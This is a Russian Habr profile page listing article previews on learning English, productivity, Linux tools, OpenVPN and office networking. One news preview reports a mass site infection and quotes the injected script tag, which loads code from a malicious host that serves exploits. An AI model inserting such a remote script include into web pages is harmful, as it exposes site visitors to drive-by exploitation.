Search
Write a publication
Pull to refresh
0
0
Руслан Архипов @Volt

User

Send message

Для тех кто учит английский

Reading time1 min
Views4.5K
image

Это вовсе не очередная статья на тему «как я учил английский» и это даже не обзор, это скорее пара слов об очень интересном видеокурсе на который я наткнулся и всем рекомендую.

Наверняка, курсы BBC Learning English неоднократно описывались, но я нашел очень интересный курс, который заинтриговал меня с самого начала.

Этот видеокурс помогает освоить различные идиомы, которые очень интересно узнавать и нужно знать обязательно. Курс ведет профессиональный актер, который очень интересно показывает эти самые идиомы и не дает заскучать.

Даже мне, с моим «poor english» было все легко и понятно, а местами смешно. :)

Предлагаю ознакомиться самим.

ProkatVsego — каталог проката и аренды всего, что угодно

Reading time2 min
Views1.7K
Привет хабрасообщество! Хотим представить на ваш суд наш (vano, vbykanov) первый полноценный стартап, посвященный прокату и аренде всего, что угодно в Украине, а вскоре и в других странах.

ProkatVsego.com.ua

ProkatVsego.com.ua – это тематическая бесплатная доска объявлений, нацеленная на сегмент предложений и запросов проката и аренды буквально всего, что угодно. Во всем мире тема проката достаточно популярна и немало компаний занимается этим, предоставляя в аренду и напрокат очень большой спектр товаров и вещей – начиная от велосипедов и заканчивая вертолетами и роскошными яхтами.
Читать дальше →

Тренировка памяти

Reading time3 min
Views46K
Вы когда-нибудь задумывались, насколько важна память для человека и конкретно для вас? Что можно достичь, с помощью хорошей памяти? А давайте прикинем прямо сейчас!? Для начала я думаю, стоит вспомнить образование и работу: прочитали книгу за несколько дней и все запомнили, экзамены за вечер на 5, язык программирования за месяц… можно продолжать долго.

Некоторые люди рождаются с феноменальной памятью, а остальные могут память тренировать и достигнуть хоть и не феноменальных результатов, но очень даже приличных, которые позволят достичь очень больших высот, не говоря уже о довольно простых вещах, перечисленных чуть выше… Поэтому моя заметка именно о тренировке памяти обычных людей: сжато и по сути.
Читать дальше →

Сам себе провайдер

Reading time1 min
Views6.7K
image

Вступление


Не так давно начали появляться почти бесплатные тарифы на сотовую связь с безлимитом внутри сети, но вот цены на мобильный интернет особо падать не собираются. А дешевый интернет на кпк \ ноуте хочется.
Читать дальше →

Полноценный доступ ко всем Linux-файловым системам в Windows 2000/XP/Vista/7 с помощью coLinux

Reading time5 min
Views116K
В данной статье я расскажу вам, как получить практически полноценный доступ для чтения и записи ко всем файловым системам, используемым в Linux (Ext2/3/4, ReiserFS, XFS, JFS, etc) из-под сабжевых операционных систем. Статья является вольным переводом данного руководства, причем написано оно уже довольно давно, но догуглился я до него только сейчас. :)
Читать дальше →

55 тыс сайтов в Интернете оказались заражены одним и тем же iframe

Reading time1 min
Views1.5K
Как сообщает компания ScanSafe в своем блоге, сегодня в Интернете была проведена массированная XSS-атака. На более, чем 55 тыс сайтов медицинских услуг и благотворительных организаций, а также на такие ресурсы, как feedzilla.com, был внедрен вредоносный iframe. Специалисты ScanSafe вычислили, что он ведет на ресурс a0v.org, с которого подгружаются еще несколько эксплойтов. При этом, как отмечают в ScanSafe, количество зараженных ресурсов продолжает расти: на момент распространения новостей в западных СМИ (TechRepublic, ZDNet), количество зараженных доменов перевалило за 55 тыс.

PS: собственно вот каким iframe заразили столько сайтов:
“script src=http://a0v.org/x.js”

В Рунете таких ресурсов довольно-таки мало, Google (чем и пользуются ScanSafe) видит этот код, например, на поддоменах product.ru

6 простых способов увеличения фрилансерской продуктивности

Reading time6 min
Views2.4K
Лучшее в фрилансерской работе это то, что вы свободны в создании вашего собственного графика и правил. Однако это может быть и плохим фактором. Без нормально структурированного офисного пространства многие фрилансеры в конце дня могут задуматься – куда же делось все их время. Может быть трудно получить максимальную пользу от всего рабочего дня. Чтобы помочь таким фрилансерам, мы хотим представить некоторые простые пути для увеличения продуктивности.
Идем дальше...

Как я работал по два часа в день

Reading time3 min
Views21K
Когда я только перешёл от офисной работы к домашней, первое время был на седьмом небе от счастья. С ума сойти – можно спать столько, сколько хочется! Можно работать тогда, когда есть «стих», а когда его нет – ходить дышать воздухом и развлекаться так, как только в голову придёт. Не счастье ли это? Примерно полгода я провёл в таком состоянии постоянного кайфа, а потом постепенно начал привыкать. А дальше началось то, что обычно бывает у большинства узников «домашнего офиса». И вот, через полтора года такой жизни я задался вопросом – а так ли уж хороша она у меня, как казалась вначале?
Читать дальше →

Полная чаша: работа дома, с женой и маленьким ребенком

Reading time2 min
Views33K
Прочитал тему про работу дома 2 часа в день, а также комментарии.
Расскажу про свой опыт работы дома. Я начал работать дома на удаленного заказчика еще когда жена была на последних месяцах беременности. Это было замечательное время. Никто не говорит когда мне вставать на работу, когда уходить с работы, много экономится времени в силу того, что не надо тратить его на дорогу, да и работа делается на удивление быстро. Мы с женой много гуляли, проводили кучу времени вместе. А потом родилась замечательная дочка!..
Читать дальше →

Личный тайм-менеджмент

Reading time9 min
Views93K
Почитав недавний топик про лягушек я понял, что Хабрасообщество не очень хорошо ориентируется в вопросах тайм-менеджмента и многие никогда не занимались построением своей тайм-системы.

Поэтому я попробую исправить этот недочёт.

Под катом Вы не найдёте каких-то инновационных моделей управления временем. Это будет фундамент, основа, без которой нельзя обойтись людям, которые заботятся о своём будущем, о своём благосостоянии и личностном развитии.

Welcome!

Читать дальше →

Инфраструктура современного офиса — 2

Reading time8 min
Views18K
Disclaimer: я не претендую на всю глубину изложения. Я принципиально опускаю моменты, требующие глубокого погружения в предмет, поскольку этот цикл статей не является энциклопедией инфраструктурщика. Кому надо больше — задавайте вопросы или ходите в ваш любимый поисковик :) Да, я лично готов ответить на все вопросы по существу. :)

Да, эта статья — продолжение цикла про организацию инфраструктуры современного офиса. Начало — здесь. Подоспело продолжение про телефонию, wi-fi и планирование провайдерских вводов

Как и в прошлый раз, при написании этой статьи я осознаю, что планка по объему материала взята слишком высоко — поэтому, в этот раз остановимся на вопросах организации СКС и общих аспектах организации сети (ЛВС). В следующий раз, стало быть, дойдем до беспроводных решений, телефонии и организации внешних вводов. В качестве необъявленного ранее бонус-трека последует отдельная статья о типовых решениях построения сети на оборудовании Allied Telesis.

СКС

Для специалиста по ИТ структурированная кабельная система является, по сути, базисом для всех систем, обеспечивающих функционирование офиса с точки зрения информационных технологий. Сама по себе СКС — совокупность пассивного коммутационного оборудования, обеспечивающего физическую взаимосвязь между геометрически распределенными элементами офиса. В состав СКС входит, в общем случае, следующее:
  1. Кабельная продукция (витая пара, оптические кабели, коаксиальные кабели)
  2. Коммутационные и кроссовые панели (патч-панели, плинты, муфты)
  3. Оконечные (со стороны пользователя) устройства — всевозможные розетки и разъемы. Сюда же, кстати, стоит отнести и патч-корды, соединяющие вышеуказанные розетки непосредственно с клиентским оборудованием.

В настоящее время, СКС регламентируется рядом стандартов:
  • EIA/TIA-568В Commercial Building Telecommunications Wiring Standard (американский стандарт)
  • ISO/IEC IS 11801 Information Technology. Generic cabling for customer premises (международный стандарт)
  • CENELEC EN 50173 Information Technology. Generic cabling systems (европейский стандарт)

В общем случае, проект вашей СКС должен соответствовать как минимум одному из указанных стандартов. К слову, наиболее употребимые формулировки категорий СКС — «5», «5e», «6» определены в американском стандарте. Если вы не подключены к интернет по WiFi, посмотрите на маркировку кабеля, который соединяет ваш компьютер с сетевой розеткой на стене — скорее всего, там будет присутствовать либо «5e», либо «6». По большому счету, от категории СКС зависит только теоретическая скорость передачи данных по кабелям, но об этом — чуть ниже.

А почему, кстати, сразу не воткнуть кабели в свитч — спросит въедливый читатель..

И почему же?

Пакеты с getdeb.net теперь доступны в качестве неофициального репозитория

Reading time1 min
Views1.6K
Я люблю когда стоит последняя версия любимого пакета, но к сожалению официальный репозиторий не всегда их содержит, поэтому часто приходится пользоваться getdeb.net. Сегодня набор зависимостей оказался таким, что руками не получилось с ними разобраться, после гугления было обнаружено зеркало:
deb http://ubuntu.org.ua getdeb/
Читать дальше →

Свершилось! Colocation за 1000 рублей

Reading time2 min
Views5.4K
После опубликования статьи Intel Atom colocation последовали баталии тут на хабре, и в логове хостеров (на hostobzor-е). Ценой нечеловеческих усилий :-) таки удалось убедить некоторые компании, что это(colocation неттопов) может быть выгодно. Предлагаю читателям хабра поучаствовать в первом размещении неттопов в ДЦ (М-101, Москва) — подробности под катом.

Напоминаю — это возможность поиметь свой сервер с 2-4Гб памяти, нормальным каналом и дисковым IO по цене завалящего VPS.

Кстати, хороший пример того, как хабр может сделать мир лучше :-)
Читать дальше →

Couchsurfing.org или клубы гостеприимства

Reading time2 min
Views1.4K
image
Год назад я путешествовал по Европе автостопом. Один раз, расположившись недалеко от автобана, я разбил палатку, как вдруг обнаружил, что ко мне бравым шагом направляются двое полицейских.
Пожурив меня за пренебрежение частной собственностью, и подвезя до ближайшего хостела, полицаи взяли с меня слово, что в следующий раз я предварительно найду у кого остановиться через couchsurfing. Таким образом я первый раз узнал об этом необычном сайте.
Читать дальше →

Легкий Linux дистрибутив для кофейников из Windows

Reading time5 min
Views93K
Выбор легковесной и быстрой OC на базе Linux

С Windows я уже давно и поэтому хочешь-не хочешь, а привыкаешь к тому, чем пользуешься каждый день. После я заметил, что для работы мне в 90% случаев хватает связки Opera + Google Docs + Skype. В Windows меня все больше раздражало время загрузки и «разгрузки» (при выключении). Общая скорость работы системы.

Поэтому я поставил себе задачу найти легковесную ОС, которая бы удовлетворяла следующим параметрам:
— быстро грузиться и выгружаться
— легко устанавливаться, как для чайничков
— сразу подхватывать WiFi карточку и сеть (скрытая Wi-Fi сеть с WPA шифрованием)
— иметь возможность установки Оперы без лишних проблем (или из-коробки)
— поддержка русского из-коробки (ну или с простой доустановкой)

Дополнительными плюсами были бы (из коробки):
— установленный Skype
— просмотрщик PDF документов.
— чистый и минималистичный интерфейс (В Windows вместо Explorer стоит порт Blackbox — BBlean)

В Windows я ориентируюсь неплохо, а с Linux практически никогда не сталкивался, поэтому фразы стиля «Выберите файловую систему: Ext2, Ext3, Ext4, ReiserFS, XFS» вводят меня в легкий транс.
Читать дальше →

OpenVPN: создание полноценного openVPN gateway

Reading time5 min
Views241K
OpenVPN — это система, позволяющая создавать шифрованные туннели между компьютерами по технологии VPN (Virtual Private Network, виртуальная частная сеть).

Основные плюсы такой модели:

  • Просто: настройка занимает менее часа и не требует специальных знаний.
  • Экономно: трафик сжимается lzo.
  • Безопасно: весь трафик шифруется, а клиенты разделены между собой.
  • Иногда по-другому просто никак. :)


Несмотря на эти пункты, нормальной статьи о настройке OpenVPN на Хабрахабре я не нашел. Чтож, попытаюсь исправить это своими силами.

Я специально стараюсь не углубляться в технические подробности, но и расписывать принципы сборки ядра и установки ПО в вашем дистрибутиве не буду — это выходит за пределы статьи.

За основу возьмем OpenVPN-2.0.9 и Gentoo Linux в качестве сервера и Linux либо Windows в качестве клиента.

Нырнуть глубже

Установка Ubuntu Linux с винчестера. Скрипт

Reading time5 min
Views24K
image
Никогда не любил устанавливать Ubuntu с Live-CD/DVD. Иногда может быть диск поцарапан и установка прерывается на самом интересном месте, музыку не послушаешь, фильмы не посмотришь. Я устанавливаю Ubuntu из iso-образа со своего жесткого диска на другой винчестер или раздел. Читая раньше в инете статьи, как ставить с жесткого диска, я просто слепо следовал инструкциям, копируя и выполняя команды. Бывали проблемы с загрузчиком grub, приходилось дополнительно искать в интернете решения, как исправить эти ошибки. Затем, чтобы не мучаться, я сделал свой скрипт установки.

Задача: Нужно, используя уже установленную Ubuntu, установить систему на другой винчестер.
Читать дальше →

Распараллеливание задач в Linux

Reading time2 min
Views11K
Потребовалось мне перекодировать некоторое количество видео-файлов. Для этого я написал следующий сценарий:

#!/bin/bash

recode() {
mencoder -o $2 $1 -ovc x264 -x264encopts bitrate=22000:keyint=50 -oac mp3lame -lameopts vbr=3:br=320 -fps 50
}
recode input/00108.mts 00108.avi
recode input/00109.mts 00109.avi
...
...


Казалось-бы все готово, но я заметил, что загружен только один процессор из двух, а это значит, что этот процесс можно ускорить, раза в два.
Читать дальше

Практика разговорного американского

Reading time5 min
Views25K
По мотивам предыдущих постов: "Практика разговорного английского языка" и "Как учить английские слова".

imageВ современном мире многие сталкиваются с необходимостью изучить иностранный язык. Чаще всего этим языком является английский. Методов изучения иностранного языка, и английского в том числе, существует много: заучивание слов по карточкам; расклеивание стикеров с названиями предметов по всему дому; метод 25-го кадра (хотя лично я в него не верю); штудирование грамматики,– как с репетитором/в школе/в университете/на курсах, так и самостоятельно; метод погружения, наконец. В общем, есть из чего выбрать. Благо, на просторах Интернета материалов можно найти великое множество.

Выбор конкретного метода, а может быть, и нескольких, зависит от мотивации. Прежде чем остановиться на каком-то из них, задайте себе вопрос: «Для чего я учу язык?». Кому-то будет вполне достаточно базовых знаний грамматики и словаря, — просто потому, что язык нужен только для чтения статей, например. А кому-то этого будет мало. Да, грамматика и лексика – это, конечно, хорошо. Они – основа языка, его фундамент и стены. Но как быть с живой речью? Ведь понимание иностранной речи, а потом и возможность говорить на иностранном языке – немаловажная составляющая.
Читать дальше →

Information

Rating
Does not participate
Location
Москва и Московская обл., Россия
Date of birth
Registered
Activity